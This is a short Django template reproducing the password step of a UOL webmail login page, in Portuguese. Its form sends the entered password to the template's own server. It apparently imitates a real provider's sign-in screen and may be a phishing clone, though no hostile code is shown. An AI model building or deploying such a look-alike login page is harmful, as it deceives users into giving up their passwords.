{% extends '../base.html' %}
{% load static%}
{% block content%}
{% block extra %}
<link rel="stylesheet"
  href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-icons/1.13.1/font/bootstrap-icons.min.css">
{% endblock %}
<div class="top-text">
  <p>Gerencie seus e-mails com a segurança que só o UOL te oferece.</p>
</div>
<div class="heading">
  <h2>Entrar</h2>
</div>
<div class="pass">
  <h4>
    Informe sua senha
  </h4>
</div>
<div class="email">
  <i class="bi bi-person-circle"></i>
  <p>{{email}}email</p>
  <i class="bi bi-x"></i>
</div>
<form method="post">
  {%csrf_token%}
  <div class="input-wrapper">
    <input name="password" id="password" placeholder="Senha" name="user" type="password" required>
    <span id="pass-label" for="password">monstrar</span>
    {% if check_pass == 'incorrect' %}
    <p style="color: red; margin-bottom: 20px; margin-top: 5px; font-size: .7rem;">
      Senha incorreta. Tente novamente.
    </p>
    {% endif %}
  </div>
  <button type="submit">
    Entrar
  </button>
</form>
<div class="buttom-txt">
  <a style="margin-top: 20px;" href="#">
    Esqueceu a senha?
  </a>
</div>
{% endblock %}
{% block js %}

<script src="{% static 'app.js' %}"></script>

{% endblock %}